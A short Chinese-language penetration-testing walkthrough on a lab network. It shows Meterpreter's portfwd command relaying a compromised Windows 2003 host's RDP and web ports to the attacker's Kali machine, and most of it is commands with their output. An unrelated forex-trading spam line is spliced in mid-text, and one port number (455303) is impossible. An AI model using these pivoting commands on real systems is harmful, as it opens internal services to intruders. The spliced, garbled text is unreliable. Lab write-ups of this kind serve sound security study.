基于Portfwd端口转发

Portfwd是一款强大的端口转发工具，支持TCP，UDP，支持IPV4--IPV6的转换转发。 并且内置于meterpreter。 其中exe单版本源码如下：

https://github.com/rssnsj/portfwd

复现过程

攻击机： 192.168.1.5 Debian（Kali）

靶 机： 192.168.1.4 Windows7

192.168.1.119 Windows 2003

Sessions -l查看所有msf的连接，看到一条连接到windows 03通信，是从192.168.1.1:455303到192.168.1.119:53

session -l 查看会话

靶机IP为：192.168.1.119---windows 2003---x64

function(){ //外汇跟单www.gendan5.com

需要转发端口为：80，3389

选择连接中的1号，就一条所以就只能选这个了

Portfwd -h查看用法

攻击执行

1 meterpreter > portfwd add ‐ l 33389 ‐ r 192.168.1.119 ‐ p 3389

2 [ * ] Local TCP relay created: : 33389 <‐> 192.168.1.119 : 3389

3 meterpreter > portfwd add ‐ l 30080 ‐ r 192.168.1.119 ‐ p 80

4 [ * ] Local TCP relay created: : 30080 <‐> 192.168.1.119 : 80

5 meterpreter > portfwd

6 Index Local RemoteDirection

7 1 0.0.0.0 : 33389 192.168.1.119 : 3389 Forward

8 2 0.0.0.0 : 30080 192.168.1.119 : 80 Forward

9 2 total active port forwards .

成功